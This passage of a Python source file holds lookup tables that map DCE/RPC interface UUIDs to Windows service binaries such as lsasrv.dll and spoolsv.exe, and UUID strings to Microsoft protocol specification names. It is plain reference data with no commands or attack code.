\"vpnikeapi.dll\",\nb\"\\x26\\xc0\\xe1\\xac\\x3f\\x8b\\x11\\x47\\x89\\x18\\xf3\\x45\\xd1\\x7f\\x5b\\xff\\x01\\x00\": \"lsasrv.dll\",\nb\"\\xc0\\xc4\\x55\\xae\\xce\\x64\\xdd\\x11\\xad\\x8b\\x08\\x00\\x20\\x0c\\x9a\\x66\\x01\\x00\": \"bdesvc.dll\",\nb\"\\xc4\\x0c\\x3c\\xe3\\x82\\x04\\x1a\\x10\\xbc\\x0c\\x02\\x60\\x8c\\x6b\\xa2\\x18\\x01\\x00\": \"locator.exe\",\nb\"\\x0e\\x3b\\x6c\\x50\\xd1\\x4b\\x56\\x4c\\x88\\xc0\\x49\\xa2\\x0e\\xd4\\xb5\\x39\\x01\\x00\": \"milcore.dll\",\nb\"\\x3e\\x8e\\xb0\\x2e\\x9f\\x63\\xba\\x4f\\x97\\xb1\\x14\\xf8\\x78\\x96\\x10\\x76\\x01\\x00\": \"gpsvc.dll\",\nb\"\\x66\\x9f\\x9b\\x62\\x6c\\x55\\xd1\\x11\\x8d\\xd2\\x00\\xaa\\x00\\x4a\\xbd\\x5e\\x02\\x00\": \"sens.dll\",\nb\"\\xb5\\x6d\\xac\\xc9\\xb7\\x82\\x55\\x4e\\xae\\x8a\\xe4\\x64\\xed\\x7b\\x42\\x77\\x01\\x00\": \"sysntfy.dll\",\nb\"\\x98\\x46\\xbc\\xa0\\xd7\\xb8\\x30\\x43\\xa2\\x8f\\x77\\x09\\xe1\\x8b\\x61\\x08\\x04\\x00\": \"Sens.dll\",\nb\"\\x1e\\xc9\\x31\\x3f\\x45\\x25\\x7b\\x4b\\x93\\x11\\x95\\x29\\xe8\\xbf\\xfe\\xf6\\x01\\x00\": \"p2psvc.dll\",\nb\"\\x3e\\xca\\x86\\xc3\\x61\\x90\\x72\\x4a\\x82\\x1e\\x49\\x8d\\x83\\xbe\\x18\\x8f\\x02\\x00\": \"audiosrv.dll\",\nb\"\\x3e\\xca\\x86\\xc3\\x61\\x90\\x72\\x4a\\x82\\x1e\\x49\\x8d\\x83\\xbe\\x18\\x8f\\x02\\x02\": \"audiosrv.dll\",\nb\"\\xf8\\x91\\x7b\\x5a\\x00\\xff\\xd0\\x11\\xa9\\xb2\\x00\\xc0\\x4f\\xb6\\xe6\\xfc\\x01\\x00\": \"msgsvc.dll\",\nb\"\\x98\\xd0\\xff\\x6b\\x12\\xa1\\x10\\x36\\x98\\x33\\x46\\xc3\\xf8\\x74\\x53\\x2d\\x01\\x00\": \"dhcpssvc.dll\",\nb\"\\xb8\\xd0\\x48\\xe2\\x15\\xbf\\xcf\\x11\\x8c\\x5e\\x08\\x00\\x2b\\xb4\\x96\\x49\\x02\\x00\": \"clussvc.exe\",\nb\"\\x78\\xad\\xbc\\x1c\\x0b\\xdf\\x34\\x49\\xb5\\x58\\x87\\x83\\x9e\\xa5\\x01\\xc9\\x00\\x00\": \"lsasrv.dll\",\nb\"\\x87\\x76\\xcb\\xc8\\xd3\\xe6\\xd2\\x11\\xa9\\x58\\x00\\xc0\\x4f\\x68\\x2e\\x16\\x01\\x00\": \"WebClnt.dll\",\nb\"\\x88\\xd4\\x81\\xc6\\x50\\xd8\\xd0\\x11\\x8c\\x52\\x00\\xc0\\x4f\\xd9\\x0f\\x7e\\x01\\x00\": \"lsasrv.dll\",\nb\"\\x80\\x35\\x5b\\x5b\\xe0\\xb0\\xd1\\x11\\xb9\\x2d\\x00\\x60\\x08\\x1e\\x87\\xf0\\x01\\x00\": \"mqqm.dll\",\nb\"\\xf0\\x09\\x8f\\xed\\xb7\\xce\\x11\\xbb\\xd2\\x00\\x00\\x1a\\x18\\x1c\\xad\\x00\\x00\\x00\": \"mprdim.dll\",\nb\"\\xd8\\x5d\\xe6\\x12\\x7f\\x88\\xef\\x41\\x91\\xbf\\x8d\\x81\\x6c\\x42\\xc2\\xe7\\x01\\x00\": \"winlogon.exe\",\nb\"\\xf8\\x91\\x7b\\x5a\\x00\\xff\\xd0\\x11\\xa9\\xb2\\x00\\xc0\\x4f\\xb6\\x36\\xfc\\x01\\x00\": \"msgsvc.dll\",\nb\"\\x01\\xd0\\x8c\\x33\\x44\\x22\\xf1\\x31\\xaa\\xaa\\x90\\x00\\x38\\x00\\x10\\x03\\x01\\x00\": \"regsvc.dll\",\nb\"\\x03\\xd7\\xfd\\x17\\x27\\x18\\x34\\x4e\\x79\\xd4\\x24\\xa5\\x5c\\x53\\xbb\\x37\\x01\\x00\": \"msgsvc.dll\",\nb\"\\x1c\\x95\\x57\\x33\\xd1\\xa1\\xdb\\x47\\xa2\\x78\\xab\\x94\\x5d\\x06\\x3d\\x03\\x01\\x00\": \"LBService.dll\",\nb\"\\xab\\xbe\\x00\\xc1\\x3a\\xd3\\x4b\\x4a\\xbf\\x23\\xbb\\xef\\x46\\x63\\xd0\\x17\\x01\\x00\": \"wcncsvc.dll\",\nb\"\\xc4\\xfc\\x7b\\x82\\xb4\\x38\\xcd\\x4a\\x92\\xe4\\x21\\xe1\\x50\\x6b\\x85\\xfb\\x01\\x00\": \"SLsvc.exe\",\nb\"\\x00\\xf0\\x09\\x8f\\xed\\xb7\\xce\\x11\\xbb\\xd2\\x00\\x00\\x1a\\x18\\x1c\\xad\\x00\\x00\": \"mprdim.dll\",\nb\"\\x4b\\xa0\\x12\\x72\\x63\\xb4\\x2e\\x40\\x96\\x49\\x2b\\xa4\\x77\\x39\\x46\\x76\\x01\\x00\": \"umrdp.dll\",\nb\"\\x20\\x65\\x5f\\x2f\\x46\\xca\\x67\\x10\\xb3\\x19\\x00\\xdd\\x01\\x06\\x62\\xda\\x01\\x00\": \"tapisrv.dll\",\nb\"\\xa0\\x9e\\xc0\\x69\\x09\\x4a\\x1b\\x10\\xae\\x4b\\x08\\x00\\x2b\\x34\\x9a\\x02\\x00\\x00\": \"ole32.dll\",\nb\"\\xd0\\x3f\\x14\\x88\\x8d\\xc2\\x2b\\x4b\\x8f\\xef\\x8d\\x88\\x2f\\x6a\\x93\\x90\\x01\\x00\": \"lsm.exe\",\nb\"\\xe6\\x73\\x0c\\xe6\\xf9\\x88\\xcf\\x11\\x9a\\xf1\\x00\\x20\\xaf\\x6e\\x72\\xf4\\x02\\x00\": \"rpcss.dll\",\nb\"\\x6c\\xfc\\x79\\xde\\x6f\\xdc\\xc7\\x43\\xa4\\x8e\\x63\\xbb\\xc8\\xd4\\x00\\x9d\\x01\\x00\": \"rdpclip.exe\",\nb\"\\x41\\x82\\xb5\\x68\\x59\\xc2\\x03\\x4f\\xa2\\xe5\\xa2\\x65\\x1d\\xcb\\xc9\\x30\\x01\\x00\": \"cryptsvc.dll\",\nb\"\\x80\\xa9\\x88\\x10\\xe5\\xea\\xd0\\x11\\x8d\\x9b\\x00\\xa0\\x24\\x53\\xc3\\x37\\x01\\x00\": \"mqqm.dll\",\nb\"\\xcf\\x0b\\xa7\\x7e\\xaf\\x48\\x6a\\x4f\\x89\\x68\\x6a\\x44\\x07\\x54\\xd5\\xfa\\x01\\x00\": \"nsisvc.dll\",\nb\"\\xe0\\xca\\x02\\xec\\xe0\\xb9\\xd2\\x11\\xbe\\x62\\x00\\x20\\xaf\\xed\\xdf\\x63\\x01\\x00\": \"mq1repl.dll\",\nb\"\\xb3\\x8b\\x0b\\x59\\xf6\\x4e\\xa4\\x4c\\x83\\xcf\\xbe\\x06\\xc4\\x07\\x86\\x74\\x01\\x00\": \"PSIService.exe\",\nb\"\\xce\\x9f\\x75\\x89\\x25\\x5a\\x86\\x40\\x89\\x67\\xde\\x12\\xf3\\x9a\\x60\\xb5\\x01\\x00\": \"tssdjet.dll\",\nb\"\\x5d\\x2c\\x95\\x25\\x76\\x79\\xa1\\x4a\\xa3\\xcb\\xc3\\x5f\\x7a\\xe7\\x9d\\x1b\\x01\\x00\": \"wlansvc.dll\",\nb\"\\xc5\\x41\\x19\\xdf\\x89\\xfe\\x79\\x4e\\xbf\\x10\\x46\\x36\\x57\\xac\\xf4\\x4d\\x01\\x00\": \"efssvc.dll\",\nb\"\\xc1\\xcd\\x1a\\x8f\\x4d\\x75\\xeb\\x43\\x96\\x29\\xaa\\x16\\x20\\x92\\x8e\\x65\\x00\\x00\": \"IMEPADSM.DLL\",\nb\"\\xdf\\x76\\x49\\x65\\x98\\x14\\x56\\x40\\xa1\\x5e\\xcb\\x4e\\x87\\x58\\x4b\\xd8\\x01\\x00\": \"emdmgmt.dll\",\nb\"\\xe0\\x42\\xc7\\x4f\\x10\\x4a\\xcf\\x11\\x82\\x73\\x00\\xaa\\x00\\x4a\\xe6\\x73\\x03\\x00\": \"dfssvc.exe\",\nb\"\\xfa\\xdb\\x6e\\x0b\\x24\\x4a\\xc6\\x4f\\x8a\\x23\\x94\\x2b\\x1e\\xca\\x65\\xd1\\x01\\x00\": \"spoolsv.exe\",\nb\"\\xc8\\xb7\\xd4\\x12\\xd5\\x77\\xd1\\x11\\x8c\\x24\\x00\\xc0\\x4f\\xa3\\x08\\x0d\\x01\\x00\": \"lserver.dll\",\nb\"\\x44\\xaf\\x7d\\x8c\\xdc\\xb6\\xd1\\x11\\x9a\\x4c\\x00\\x20\\xaf\\x6e\\x7c\\x57\\x01\\x00\": \"appmgmts.dll\",\nb\"\\xae\\x99\\x86\\x9b\\x44\\x0e\\xb1\\x47\\x8e\\x7f\\x86\\xa4\\x61\\xd7\\xec\\xdc\\x00\\x00\": \"rpcss.dll\",\nb\"\\x84\\x65\\x0a\\x0b\\x0f\\x9e\\xcf\\x11\\xa3\\xcf\\x00\\x80\\x5f\\x68\\xcb\\x1b\\x01\\x01\": \"rpcss.dll\",\nb\"\\xa2\\x9c\\x14\\x93\\x3b\\x97\\xd1\\x11\\x8c\\x39\\x00\\xc0\\x4f\\xb9\\x84\\xf9\\x00\\x00\": \"scecli.dll\",\nb\"\\x7d\\x25\\x13\\xfc\\x67\\x55\\xea\\x4d\\x89\\x8d\\xc6\\xf9\\xc4\\x84\\x15\\xa0\\x01\\x00\": \"mqqm.dll\",\nb\"\\x82\\x26\\xb9\\x2f\\x99\\x65\\xdc\\x42\\xae\\x13\\xbd\\x2c\\xa8\\x9b\\xd1\\x1c\\x01\\x00\": \"MPSSVC.dll\",\nb\"\\x76\\x22\\x3a\\x33\\x00\\x00\\x00\\x00\\x0d\\x00\\x00\\x80\\x9c\\x00\\x00\\x00\\x03\\x00\": \"rpcrt4.dll\",\nb\"\\xf0\\x0e\\xd7\\xd6\\x3b\\x0e\\xcb\\x11\\xac\\xc3\\x08\\x00\\x2b\\x1d\\x29\\xc4\\x01\\x00\": \"locator.exe\",\nb\"\\xdd\\x34\\x91\\x1a\\x39\\x7b\\xba\\x45\\xad\\x88\\x44\\xd0\\x1c\\xa4\\x7f\\x28\\x01\\x00\": \"mqqm.dll\",\nb\"\\xfe\\x95\\x31\\x9b\\x03\\xd6\\xd1\\x43\\xa0\\xd5\\x90\\x72\\xd7\\xcd\\xe1\\x22\\x01\\x00\": \"tssdjet.dll\",\nb\"\\x55\\x1a\\x20\\x6f\\x4d\\xa2\\x5f\\x49\\xaa\\xc9\\x2f\\x4f\\xce\\x34\\xdf\\x98\\x01\\x00\": \"iphlpsvc.dll\",\nb\"\\x5f\\x2e\\x7e\\x89\\xf3\\x93\\x76\\x43\\x9c\\x9c\\xfd\\x22\\x77\\x49\\x5c\\x27\\x01\\x00\": \"dfsrmig.exe\",\nb\"\\x90\\x2c\\xfe\\x98\\x42\\xa5\\xd0\\x11\\xa4\\xef\\x00\\xa0\\xc9\\x06\\x29\\x10\\x01\\x00\": \"advapi32.dll\",\nb\"\\x0c\\xc5\\xad\\x30\\xbc\\x5c\\xce\\x46\\x9a\\x0e\\x91\\x91\\x47\\x89\\xe2\\x3c\\x01\\x00\": \"nrpsrv.dll\",\nb\"\\x1e\\x24\\x2f\\x41\\x2a\\xc1\\xce\\x11\\xab\\xff\\x00\\x20\\xaf\\x6e\\x7a\\x17\\x00\\x02\": \"rpcss.dll\",\nb\"\\xe6\\x53\\x3a\\x9f\\xb1\\xcb\\x54\\x4e\\x87\\x8e\\xaf\\x9f\\x82\\x3a\\xa3\\xf1\\x01\\x00\": \"MpRtMon.dll\",\nb\"\\xa8\\xe5\\xfc\\x1d\\x8a\\xdd\\x33\\x4e\\xaa\\xce\\xf6\\x03\\x92\\x2f\\xd9\\xe7\\x00\\x01\": \"wpcsvc.dll\",\nb\"\\xf0\\x0e\\xd7\\xd6\\x3b\\x0e\\xcb\\x11\\xac\\xc3\\x08\\x00\\x2b\\x1d\\x29\\xc3\\x01\\x00\": \"locator.exe\",\nb\"\\x46\\xd7\\xd0\\xe3\\xaf\\xd2\\xfd\\x40\\x8a\\x7a\\x0d\\x70\\x78\\xbb\\x70\\x92\\x01\\x00\": \"qmgr.dll\",\nb\"\\x5a\\x23\\xb5\\xc6\\x13\\xe4\\x1d\\x48\\x9a\\xc8\\x31\\x68\\x1b\\x1f\\xaa\\xf5\\x01\\x01\": \"SCardSvr.dll\",\nb\"\\x5a\\x23\\xb5\\xc6\\x13\\xe4\\x1d\\x48\\x9a\\xc8\\x31\\x68\\x1b\\x1f\\xaa\\xf5\\x01\\x00\": \"SCardSvr.dll\",\nb\"\\x69\\x45\\x81\\x7d\\xb3\\x35\\x50\\x48\\xbb\\x32\\x83\\x03\\x5f\\xce\\xbf\\x6e\\x01\\x00\": \"ias.dll\",\nb\"\\x41\\xea\\x25\\x48\\xe3\\x51\\x2a\\x4c\\x84\\x06\\x8f\\x2d\\x26\\x98\\x39\\x5f\\x01\\x00\": \"userenv.dll\",\nb\"\\xc4\\xfe\\xfc\\x99\\x60\\x52\\x1b\\x10\\xbb\\xcb\\x00\\xaa\\x00\\x21\\x34\\x7a\\x00\\x00\": \"rpcss.dll\",\nb\"\\xc5\\x28\\x47\\x3c\\xab\\xf0\\x8b\\x44\\xbd\\xa1\\x6c\\xe0\\x1e\\xb0\\xa6\\xd5\\x01\\x00\": \"dhcpcsvc.dll\",\nb\"\\xe0\\x8e\\x20\\x41\\x70\\xe9\\xd1\\x11\\x9b\\x9e\\x00\\xe0\\x2c\\x06\\x4c\\x39\\x01\\x00\": \"mqqm.dll\",\nb\"\\xbf\\x7b\\x40\\xcb\\x4f\\xc1\\xd9\\x4c\\x8f\\x55\\xcb\\xb0\\x81\\x46\\x59\\x8c\\x00\\x00\": \"IMJPDCT.EXE\",\nb\"\\x78\\x56\\x34\\x12\\x34\\x12\\xcd\\xab\\xef\\x00\\x01\\x23\\x45\\x67\\xcf\\xfb\\x01\\x00\": \"netlogon.dll\",\nb\"\\x30\\x4c\\xda\\x83\\x3a\\xea\\xcf\\x11\\x9c\\xc1\\x08\\x00\\x36\\x01\\xe5\\x06\\x01\\x00\": \"nfsclnt.exe\",\nb\"\\x1f\\xa7\\x37\\x21\\x5e\\xbb\\x29\\x4e\\x8e\\x7e\\x2e\\x46\\xa6\\x68\\x1d\\xbf\\x09\\x00\": \"wspsrv.exe - Microsoft ISA Server\",\nb\"\\x1e\\x67\\xe9\\xc0\\xc6\\x33\\x38\\x44\\x94\\x64\\x56\\xb2\\xe1\\xb1\\xc7\\xb4\\x01\\x00\": \"wbiosrvc.dll\",\nb\"\\x80\\xbd\\xa8\\xaf\\x8a\\x7d\\xc9\\x11\\xbe\\xf4\\x08\\x00\\x2b\\x10\\x29\\x89\\x01\\x00\": \"rpcrt4.dll\",\nb\"\\x8b\\x3c\\xf1\\x6a\\x44\\x08\\x83\\x4c\\x90\\x64\\x18\\x92\\xba\\x82\\x55\\x27\\x01\\x00\": \"tssdis.exe\",\nb\"\\x55\\x51\\xd8\\xec\\x3a\\xcc\\x10\\x4f\\xaa\\xd5\\x9a\\x9a\\x2b\\xf2\\xef\\x0c\\x01\\x00\": \"termsrv.dll\",\nb\"\\xe8\\x98\\x8b\\xbb\\xdd\\x84\\xe7\\x45\\x9f\\x34\\xc3\\xfb\\x61\\x55\\xee\\xed\\x01\\x00\": \"vaultsvc.dll\",\nb\"\\x86\\xb1\\x49\\xd0\\x4f\\x81\\xd1\\x11\\x9a\\x3c\\x00\\xc0\\x4f\\xc9\\xb2\\x32\\x01\\x00\": \"ntfrs.exe\",\nb\"\\x5d\\x2c\\x95\\x25\\x76\\x79\\xa1\\x4a\\xa3\\xcb\\xc3\\x5f\\x7a\\xe7\\x9d\\x1b\\x01\\x01\": \"wlansvc.dll\",\nb\"\\x7f\\x0b\\xfe\\x64\\xf5\\x9e\\x53\\x45\\xa7\\xdb\\x9a\\x19\\x75\\x77\\x75\\x54\\x01\\x00\": \"rpcss.dll\",\nb\"\\x86\\xd4\\xdc\\x68\\x9e\\x66\\xd1\\x11\\xab\\x0c\\x00\\xc0\\x4f\\xc2\\xdc\\xd2\\x02\\x00\": \"ismserv.exe\",\nb\"\\xc3\\x26\\xf2\\x76\\x14\\xec\\x25\\x43\\x8a\\x99\\x6a\\x46\\x34\\x84\\x18\\xae\\x01\\x00\": \"winlogon.exe\",\nb\"\\x23\\x05\\x7a\\xfd\\x70\\xdc\\xdd\\x43\\x9b\\x2e\\x9c\\x5e\\xd4\\x82\\x25\\xb1\\x01\\x00\": \"appinfo.dll\",\nb\"\\x40\\xfd\\x2c\\x34\\x6c\\x3c\\xce\\x11\\xa8\\x93\\x08\\x00\\x2b\\x2e\\x9c\\x6d\\x00\\x00\": \"llssrv.exe\",\nb\"\\x84\\xd8\\xb6\\x8f\\x88\\x23\\xd0\\x11\\x8c\\x35\\x00\\xc0\\x4f\\xda\\x27\\x95\\x04\\x01\": \"w32time.dll\",\nb\"\\x9b\\x06\\x33\\xae\\xa8\\xa2\\xee\\x46\\xa2\\x35\\xdd\\xfd\\x33\\x9b\\xe2\\x81\\x01\\x00\": \"spoolsv.exe\",\nb\"\\x26\\xb5\\x55\\x1d\\x37\\xc1\\xc5\\x46\\xab\\x79\\x63\\x8f\\x2a\\x68\\xe8\\x69\\x01\\x00\": \"rpcss.dll\",\nb\"\\xa0\\xaa\\x17\\x6e\\x47\\x1a\\xd1\\x11\\x98\\xbd\\x00\\x00\\xf8\\x75\\x29\\x2e\\x02\\x00\": \"clussvc.exe\",\nb\"\\xdf\\x5f\\xe9\\xbd\\xe0\\xee\\xde\\x45\\x9e\\x12\\xe5\\xa6\\x1c\\xd0\\xd4\\xfe\\x01\\x00\": \"termsrv.dll\",\nb\"\\xac\\xbe\\x00\\xc1\\x3a\\xd3\\x4b\\x4a\\xbf\\x23\\xbb\\xef\\x46\\x63\\xd0\\x17\\x01\\x00\": \"wcncsvc.dll\",\nb\"\\x78\\x56\\x34\\x12\\x34\\x12\\xcd\\xab\\xef\\x00\\x01\\x23\\x45\\x67\\x89\\xab\\x01\\x00\": \"spoolsv.exe\",\nb\"\\x06\\x50\\x7b\\x8a\\x13\\xcc\\xdb\\x11\\x97\\x05\\x00\\x50\\x56\\xc0\\x00\\x08\\x01\\x00\": \"appidsvc.dll\",\nb\"\\x20\\x60\\xae\\x91\\x3c\\x9e\\xcf\\x11\\x8d\\x7c\\x00\\xaa\\x00\\xc0\\x91\\xbe\\x00\\x00\": \"certsrv.exe\",\nb\"\\x16\\xbb\\x74\\x81\\x1b\\x57\\x38\\x4c\\x83\\x86\\x11\\x02\\xb4\\x49\\x04\\x4a\\x01\\x00\": \"p2psvc.dll\",\nb\"\\x36\\x00\\x61\\x20\\x22\\xfa\\xcf\\x11\\x98\\x23\\x00\\xa0\\xc9\\x11\\xe5\\xdf\\x01\\x00\": \"rasmans.dll\",\nb\"\\x70\\x0d\\xec\\xec\\x03\\xa6\\xd0\\x11\\x96\\xb1\\x00\\xa0\\xc9\\x1e\\xce\\x30\\x01\\x00\": \"ntdsbsrv.dll\",\nb\"\\x1c\\xef\\x74\\x0a\\xa4\\x41\\x06\\x4e\\x83\\xae\\xdc\\x74\\xfb\\x1c\\xdd\\x53\\x01\\x00\": \"schedsvc.dll\",\nb\"\\x25\\x04\\x49\\xdd\\x25\\x53\\x65\\x45\\xb7\\x74\\x7e\\x27\\xd6\\xc0\\x9c\\x24\\x01\\x00\": \"BFE.DLL\",\nb\"\\x7c\\x5a\\xcc\\xf5\\x64\\x42\\x1a\\x10\\x8c\\x59\\x08\\x00\\x2b\\x2f\\x84\\x26\\x15\\x00\": \"ntdsa.dll\",\nb\"\\xa0\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46\\x00\\x00\": \"rpcss.dll\",\nb\"\\x49\\x59\\xd3\\x86\\xc9\\x83\\x44\\x40\\xb4\\x24\\xdb\\x36\\x32\\x31\\xfd\\x0c\\x01\\x00\": \"schedsvc.dll\",\nb\"\\x35\\x08\\x22\\x11\\x26\\x5b\\x94\\x4d\\xae\\x86\\xc3\\xe4\\x75\\xa8\\x09\\xde\\x01\\x00\": \"lsasrv.dll\",\nb\"\\xa8\\x66\\x00\\xc8\\x79\\x75\\xfc\\x44\\xb9\\xb2\\x84\\x66\\x93\\x07\\x91\\xb0\\x01\\x00\": \"umrdp.dll\",\nb\"\\xab\\x59\\xec\\xf1\\xa9\\x4c\\x30\\x4c\\xb2\\xd0\\x54\\xef\\x1d\\xb4\\x41\\xb7\\x01\\x00\": \"iertutil.dll\",\nb\"\\xba\\xaa\\x67\\x52\\x49\\x4f\\x53\\x46\\x8e\\x26\\xd1\\xe1\\x1f\\x3f\\x2a\\xd9\\x01\\x00\": \"termsrv.dll\",\nb\"\\x60\\x9e\\xe7\\xb9\\x52\\x3d\\xce\\x11\\xaa\\xa1\\x00\\x00\\x69\\x01\\x29\\x3f\\x00\\x00\": \"rpcss.dll\",\nb\"\\x60\\x9e\\xe7\\xb9\\x52\\x3d\\xce\\x11\\xaa\\xa1\\x00\\x00\\x69\\x01\\x29\\x3f\\x00\\x02\": \"rpcss.dll\",\nb\"\\x38\\x47\\xaf\\x3f\\x21\\x3a\\x07\\x43\\xb4\\x6c\\xfd\\xda\\x9b\\xb8\\xc0\\xd5\\x01\\x02\": \"audiosrv.dll\",\nb\"\\x38\\x47\\xaf\\x3f\\x21\\x3a\\x07\\x43\\xb4\\x6c\\xfd\\xda\\x9b\\xb8\\xc0\\xd5\\x01\\x01\": \"audiosrv.dll\",\nb\"\\x20\\x32\\x5f\\x2f\\x26\\xc1\\x76\\x10\\xb5\\x49\\x07\\x4d\\x07\\x86\\x19\\xda\\x01\\x02\": \"netdde.exe\",\nb\"\\xbf\\x11\\x9d\\x7f\\xb9\\x7f\\x6b\\x43\\xa8\\x12\\xb2\\xd5\\x0c\\x5d\\x4c\\x03\\x01\\x00\": \"MPSSVC.dll\",\nb\"\\xbf\\x52\\x5a\\xb2\\xdd\\xe5\\x4a\\x4f\\xae\\xa6\\x8c\\xa7\\x27\\x2a\\x0e\\x86\\x01\\x00\": \"keyiso.dll\",\nb\"\\x04\\x22\\x11\\x4b\\x19\\x0e\\xd3\\x11\\xb4\\x2b\\x00\\x00\\xf8\\x1f\\xeb\\x9f\\x01\\x00\": \"ssdpsrv.dll\",\nb\"\\x97\\xb2\\xee\\x04\\xf4\\xcb\\x6b\\x46\\x8a\\x2a\\xbf\\xd6\\xa2\\xf1\\x0b\\xba\\x01\\x00\": \"efssvc.dll\",\nb\"\\x40\\xb2\\x9b\\x20\\x19\\xb9\\xd1\\x11\\xbb\\xb6\\x00\\x80\\xc7\\x5e\\x4e\\xc1\\x01\\x00\": \"irmon.dll\",\nb\"\\x96\\x3f\\xf0\\x76\\xfd\\xcd\\xfc\\x44\\xa2\\x2c\\x64\\x95\\x0a\\x00\\x12\\x09\\x01\\x00\": \"spoolsv.exe\",\nb\"\\x4a\\xa5\\xbb\\x06\\x05\\xbe\\xf9\\x49\\xb0\\xa0\\x30\\xf7\\x90\\x26\\x10\\x23\\x01\\x00\": \"wscsvc.dll\",\nb\"\\xa6\\xb2\\xdd\\x1b\\xc3\\xc0\\xbe\\x41\\x87\\x03\\xdd\\xbd\\xf4\\xf0\\xe8\\x0a\\x01\\x00\": \"dot3svc.dll\",\nb\"\\x82\\x15\\x41\\xaa\\xdf\\x9b\\xfb\\x48\\xb4\\x2b\\xfa\\xa1\\xee\\xe3\\x39\\x49\\x01\\x00\": \"nlasvc.dll\",\nb\"\\xfa\\x9d\\xd7\\xd2\\x00\\x34\\xd0\\x11\\xb4\\x0b\\x00\\xaa\\x00\\x5f\\xf5\\x86\\x01\\x00\": \"dmadmin.exe\",\nb\"\\x12\\xfc\\x99\\x60\\xff\\x3e\\xd0\\x11\\xab\\xd0\\x00\\xc0\\x4f\\xd9\\x1a\\x4e\\x03\\x00\": \"FXSAPI.dll\",\nb\"\\x1e\\x24\\x2f\\x41\\x2a\\xc1\\xce\\x11\\xab\\xff\\x00\\x20\\xaf\\x6e\\x7a\\x17\\x00\\x00\": \"rpcss.dll\",\nb\"\\xd5\\x33\\x9a\\x2c\\xdb\\xf1\\x2d\\x47\\x84\\x64\\x42\\xb8\\xb0\\xc7\\x6c\\x38\\x01\\x00\": \"tbssvc.dll\",\nb\"\\x30\\x7c\\xde\\x3d\\x5d\\x16\\xd1\\x11\\xab\\x8f\\x00\\x80\\x5f\\x14\\xdb\\x40\\x01\\x00\": \"services.exe\",\nb\"\\x86\\xb1\\x49\\xd0\\x4f\\x81\\xd1\\x11\\x9a\\x3c\\x00\\xc0\\x4f\\xc9\\xb2\\x32\\x01\\x01\": \"ntfrs.exe\",\nb\"\\x94\\x8c\\x95\\x95\\x24\\xa4\\x55\\x40\\xb6\\x2b\\xb7\\xf4\\xd5\\xc4\\x77\\x70\\x01\\x00\": \"winlogon.exe\",\nb\"\\xe3\\x31\\x67\\x32\\xc0\\xc1\\x69\\x4a\\xae\\x20\\x7d\\x90\\x44\\xa4\\xea\\x5c\\x01\\x00\": \"profsvc.dll\",\nb\"\\x18\\x5a\\xcc\\xf5\\x64\\x42\\x1a\\x10\\x8c\\x59\\x08\\x00\\x2b\\x2f\\x84\\x26\\x38\\x00\": \"ntdsai.dll\",\nb\"\\x0f\\x6a\\xe9\\x4b\\x52\\x9f\\x29\\x47\\xa5\\x1d\\xc7\\x06\\x10\\xf1\\x18\\xb0\\x01\\x00\": \"wbiosrvc.dll\",\nb\"\\x80\\x42\\xad\\x82\\x6b\\x03\\xcf\\x11\\x97\\x2c\\x00\\xaa\\x00\\x68\\x87\\xb0\\x02\\x00\": \"infocomm.dll\",\nb\"\\x87\\x04\\x26\\x1f\\x29\\xba\\x13\\x4f\\x92\\x8a\\xbb\\xd2\\x97\\x61\\xb0\\x83\\x01\\x00\": \"termsrv.dll\",\nb\"\\x70\\x07\\xf7\\x18\\x64\\x8e\\xcf\\x11\\x9a\\xf1\\x00\\x20\\xaf\\x6e\\x72\\xf4\\x00\\x00\": \"ole32.dll\",\nb\"\\xc0\\xeb\\x4f\\xfa\\x91\\x45\\xce\\x11\\x95\\xe5\\x00\\xaa\\x00\\x51\\xe5\\x10\\x04\\x00\": \"autmgr32.exe\",\nb\"\\x10\\xca\\x8c\\x70\\x69\\x95\\xd1\\x11\\xb2\\xa5\\x00\\x60\\x97\\x7d\\x81\\x18\\x01\\x00\": \"mqdssrv.dll\",\nb\"\\x28\\x2c\\xf5\\x45\\x9f\\x7f\\x1a\\x10\\xb5\\x2b\\x08\\x00\\x2b\\x2e\\xfa\\xbe\\x01\\x00\": \"WINS.EXE\",\nb\"\\x31\\xa3\\x59\\x2f\\x7d\\xbf\\xcb\\x48\\x9e\\x5c\\x7c\\x09\\x0d\\x76\\xe8\\xb8\\x01\\x00\": \"termsrv.dll\",\nb\"\\x61\\x26\\x45\\x4a\\x90\\x82\\x36\\x4b\\x8f\\xbe\\x7f\\x40\\x93\\xa9\\x49\\x78\\x01\\x00\": \"spoolsv.exe\",\n}\n\nKNOWN_PROTOCOLS = {\n'52C80B95-C1AD-4240-8D89-72E9FA84025E':'[MC-CCFG]: Server Cluster:',\n'FA7660F6-7B3F-4237-A8BF-ED0AD0DCBBD9':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'450386DB-7409-4667-935E-384DBBEE2A9E':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'832A32F7-B3EA-4B8C-B260-9A2923001184':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'2D9915FB-9D42-4328-B782-1B46819FAB9E':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'0DD8A158-EBE6-4008-A1D9-B7ECC8F1104B':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'0716CAF8-7D05-4A46-8099-77594BE91394':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'B80F3C42-60E0-4AE0-9007-F52852D3DBED':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'0344CDDA-151E-4CBF-82DA-66AE61E97754':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'8BED2C68-A5FB-4B28-8581-A0DC5267419F':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'7883CA1C-1112-4447-84C3-52FBEB38069D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'09829352-87C2-418D-8D79-4133969A489D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'5B5A68E6-8B9F-45E1-8199-A95FFCCDFFFF':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'9BE77978-73ED-4A9A-87FD-13F09FEC1B13':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'ED35F7A1-5024-4E7B-A44D-07DDAF4B524D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'4DFA1DF3-8900-4BC7-BBB5-D1A458C52410':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'370AF178-7758-4DAD-8146-7391F6E18585':'[MC-IISA]: Internet Information Services (IIS) Application 